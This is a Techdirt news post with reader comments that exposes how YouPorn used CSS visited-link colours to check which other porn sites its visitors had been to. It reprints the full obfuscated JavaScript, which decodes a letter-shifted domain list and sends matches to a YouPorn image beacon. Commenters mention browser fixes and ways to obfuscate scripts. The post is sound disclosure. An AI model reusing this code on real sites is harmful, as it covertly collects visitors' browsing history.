How YouPorn Tries To Hide That It's Spying On Your Browsing History
from the what,-no-rot-13? dept
There's a fair bit of attention being paid to a Forbes article about some new research concerning how a bunch of websites, including YouPorn, are exploiting a simple security hole to see what other sites you've visited:How does it work? It's based on your browser changing the color of links you've already clicked on. A script on the site exploits a Web privacy leak to quickly check and see whether your browser reveals that the links to a host of other porn sites have been assigned the color "purple," meaning you've clicked them before.This isn't a huge surprise, but what I found most fascinating was how YouPorn sought to hide this bit of javascript by "encrypting" it. And by "encrypting" it, I mean switching letters one letter up in the alphabet. As Kashmir Hill explains:
The script on YouPorn’s site that checks a user’s history (which you can see for yourself by going to the site and checking out its html with “View Source”) looks like this:What's amazing is that anyone actually thought this was a worthwhile move. It's not that hard to "decrypt" and it's almost obvious to the naked eye because it's not too difficult to figure out how the "encryption" (and I use that word loosely) works just by noticing all the terms that end in /dpn. You'd think even a rot-13 would throw a few more people off the scent.<script type="text/javascript"> function ypol(){var k={0:"qpsoivc/dpn",1:"sfeuvcf/dpn", 2:"bevmugsjfoegjoefs/dpn",3:"ywjefpt/dpn",4:"uvcf9/dpn", 5:"yoyy/dpn",6:"nfhbqpso/dpn",7:"nfhbspujd/dpn", 8:"yibntufs/dpn",9:"bxfnqjsf/dpn",10:"sfbmjuzljoht/dpn", 11:"csb{{fst/dpn",12:"yuvcf/dpn",13:"cbohcspt2/dpn", 14:"gmjoh/dpn",15:"gsffpoft/dpn",16:"nzgsffqbztjuf/dpn", 17:"efcpobjscmph/dpn",18:"qbztfswf/dpn",19:"nbyqpso/dpn", 20:"wjefpt{/dpn",21:"bfco/ofu",22:"qpsopsbnb/dpn"}; var g=[];for(var m in k){var d=k[m]; var a="";for(var f=0;f<d.length;f++) {a+=String.fromCharCode(d.charCodeAt(f)-1)}var h=false; for(var j in {"http://":"","http://www.":""}) {var l=document.createElement("a"); l.href=j+a;document.getElementById("ol").appendChild(l); var e="";if(navigator.appName.indexOf("Microsoft")!=-1){e=l.currentStyle.color} else{e=document.defaultView.getComputedStyle(l,null).getPropertyValue("color")} if(e=="rgb(12, 34, 56)"||e=="rgb(12,34,56)"){h=true}}if(h){g.push(m)}} var b=(g instanceof Array)?g.join(","):"";var c=document.createElement("img"); c.src="http://ol.youporn.com/blank.gif?id="+b;document.getElementById("ol").appendChild(c)}ypol(); </script>That list of gibberish contains the sites that YouPorn is checking to see if you’ve visited, but disguises them with a bit o’ simple cryptography. Dial back each letter by one, so “qpsoivc/dpn”, for example, becomes “pornhub.com.”
Thank you for reading this Techdirt post. With so many things competing for everyone’s attention these days, we really appreciate you giving us your time. We work hard every day to put quality content out there for our community.
Techdirt is one of the few remaining truly independent media outlets. We do not have a giant corporation behind us, and we rely heavily on our community to support us, in an age when advertisers are increasingly uninterested in sponsoring small, independent sites — especially a site like ours that is unwilling to pull punches in its reporting and analysis.
While other websites have resorted to paywalls, registration requirements, and increasingly annoying/intrusive advertising, we have always kept Techdirt open and available to anyone. But in order to continue doing so, we need your support. We offer a variety of ways for our readers to support us, from direct donations to special subscriptions and cool merchandise — and every little bit helps. Thank you.
–The Techdirt Team
Filed Under: browsers, encryption, history, javascript, spying
Companies: youporn
Reader Comments
Subscribe: RSS
View by: Time | Thread
TANSTAAFL
[ link to this | view in chronology ]
#corrections
should be: scent
Have a good day, and I wish I could check this out for myself at work. ;)
[ link to this | view in chronology ]
Silly techdirt
[ link to this | view in chronology ]
Re: Silly techdirt
And, meh, this is a common little trick that browsers are already "fixing" pretty quickly.
[ link to this | view in chronology ]
Re: Silly techdirt
[ link to this | view in chronology ]
This is fixed in Firefox 4, see http://dbaron.org/mozilla/visited-privacy and https://developer.mozilla.org/en/CSS/Privacy_and_the_:visited_selector for the details. The relevant bug is https://bugzilla.mozilla.org/show_bug.cgi?id=147777.
If you are still using Firefox 3, the Link Status extension (https://addons.mozilla.org/pt-BR/firefox/addon/12312/) has a checkbox to disable the visited link color, and it shows a star on the status bar if the link is visited (so you do not lose the ability to know if you have already visited that link).
[ link to this | view in chronology ]
Re:
[ link to this | view in chronology ]
Re: Re:
[ link to this | view in chronology ]
Re: Re: Re:
[ link to this | view in chronology ]
Re:
NoScript isn't just JS whitelisting, after all. When you set "Scripts Globally Allowed (dangerous)", you still get the XSS-filter, clickjacking protection, ABE (protection against router exploits bounced off your browser), etc.
[ link to this | view in chronology ]
Re: Re:
[ link to this | view in chronology ]
Re:
[ link to this | view in chronology ]
Re: Re:
[ link to this | view in chronology ]
[ link to this | view in chronology ]
Personally I think it is dumb because it can be "decrypted" or deobfuscated by just running the script with a few modifications.
[ link to this | view in chronology ]
Re:
I think not, although it might be considered blurring.
[ link to this | view in chronology ]
Its to get past nanny and keyword checkers on scripts.
It takes away all the nasty keywords that are used by that type of protection software.
[ link to this | view in chronology ]
Re: Its to get past nanny and keyword checkers on scripts.
[ link to this | view in chronology ]
[ link to this | view in chronology ]
[ link to this | view in chronology ]
would this classify as DMCA...
[ link to this | view in chronology ]
Awesome
[ link to this | view in chronology ]
Old news, but it's still a good refresher.
I told him, straight up: "No. It is not my responsibility to leave open a potential security risk for the sake of convenience for either of us. Fix your [removed] cookie problem."
I find it quite interesting people refuse to take responsibility for their actions when things like this appear.
What, is it really difficult to remember one username and several passwords at various sites? Clean out the browser history upon close? Stop using idiotic add-ons to store sensitive information, such as CC numbers?
When people, using these features, then turn and complain about compromises, I can only think "relish in your own stupidity" because they want short cuts, not responsible actions.
Then again, now that there's an ever-increasing demand for "password strength" patterns so convoluted they require people to write them down just so they can remember them, I can't really blame them for using software to remember it for them.
Hence why "webmaster" is now in quotes. Most aren't masters at all, but idiots.
See you around the next "vulnerability" to laziness.
>:)
[ link to this | view in chronology ]
[ link to this | view in chronology ]
oh oh
[ link to this | view in chronology ]
[ link to this | view in chronology ]
Re:
[ link to this | view in chronology ]
Re:
[ link to this | view in chronology ]
meh
[ link to this | view in chronology ]
HAHA!
[ link to this | view in chronology ]
Re: HAHA!
If you get to those sites and enable them to watch whatever you want to watch you are disabling the protection those things had to offer.
Flash can access the OS directly and put files in your PC what privacy or security is that?
Same goes to JAVA(not to be confused with Javascript they are different).
Given that porn websites are hostile and many of them will get hacked and carry malicious payloads people should be careful enabling anything in there.
[ link to this | view in chronology ]
There are a number of
This was just lazy/inexperienced work.
[ link to this | view in chronology ]
they should have used Billy Hoffman's javascript dehydration technique (http://blip.tv/file/3684946 ~ 50 min mark) -- it hides your javascript in whitespace (tabs and spaces being 1s and 0s) -- brilliant and pure evil
[ link to this | view in chronology ]
Re:
[ link to this | view in chronology ]
Re: Re:
[ link to this | view in chronology ]
[ link to this | view in chronology ]
Nothing new
[ link to this | view in chronology ]
Re: Nothing new
[ link to this | view in chronology ]
[ link to this | view in chronology ]
Ignore them.
Fin.
[ link to this | view in chronology ]